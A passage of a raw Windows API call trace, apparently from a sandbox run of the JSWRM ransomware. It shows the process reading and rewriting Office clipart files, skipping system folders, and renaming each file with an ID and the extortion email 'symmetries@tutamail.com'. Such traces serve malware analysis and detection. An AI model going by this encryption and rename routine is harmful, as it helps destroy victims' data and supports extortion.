lpUsedDefaultChar=0x0) returned 12 [0099.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0099.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0099.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143758.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143758.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143758.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0099.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0099.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0099.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0099.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143758.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.956] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1695) returned 1 [0099.956] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x690) returned 0x22d530 [0099.956] ReadFile (in: hFile=0x338, lpBuffer=0x22d530, nNumberOfBytesToRead=0x690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e534*=0x690, lpOverlapped=0x0) returned 1 [0100.006] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.006] WriteFile (in: hFile=0x338, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e530*=0x690, lpOverlapped=0x0) returned 1 [0100.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0100.006] CloseHandle (hObject=0x338) returned 1 [0100.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0100.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0100.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0100.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0100.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0100.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.007] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143758.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143758.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143758.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.008] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x322db73c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x322db73c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0100.008] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0100.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0100.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0100.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.008] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x124a, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB00516L.GIF", cAlternateFileName="")) returned 1 [0100.008] lstrcmpiW (lpString1="WB00516L.GIF", lpString2=".") returned 1 [0100.008] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="..") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="...") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="windows") returned -1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="recovery") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="perflogs") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="documents and settings") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="system volume information") returned 1 [0100.009] lstrcmpiW (lpString1="WB00516L.GIF", lpString2="msocache") returned 1 [0100.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0100.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00516L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00516L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00516L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0100.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00516L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00516L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00516L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00516l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.010] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4682) returned 1 [0100.010] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1240) returned 0x24d210 [0100.010] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1240, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x1240, lpOverlapped=0x0) returned 1 [0100.012] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.012] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x1240, lpOverlapped=0x0) returned 1 [0100.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.012] CloseHandle (hObject=0x338) returned 1 [0100.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0100.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0100.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0100.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0100.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0100.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00516l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00516L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00516l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0100.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.013] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2017, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB00531L.GIF", cAlternateFileName="")) returned 1 [0100.013] lstrcmpiW (lpString1="WB00531L.GIF", lpString2=".") returned 1 [0100.013] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="..") returned 1 [0100.013] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="...") returned 1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="windows") returned -1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="recovery") returned 1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="perflogs") returned 1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="documents and settings") returned 1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="system volume information") returned 1 [0100.014] lstrcmpiW (lpString1="WB00531L.GIF", lpString2="msocache") returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00531L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00531L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00531L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00531L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00531L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00531L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00531l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.015] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8215) returned 1 [0100.015] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2010) returned 0x24d210 [0100.015] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2010, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x2010, lpOverlapped=0x0) returned 1 [0100.019] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.019] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x2010, lpOverlapped=0x0) returned 1 [0100.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.019] CloseHandle (hObject=0x338) returned 1 [0100.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0100.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0100.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0100.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00531l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00531L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00531l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0100.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.020] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11030b47, ftCreationTime.dwHighDateTime=0x1d327e8, 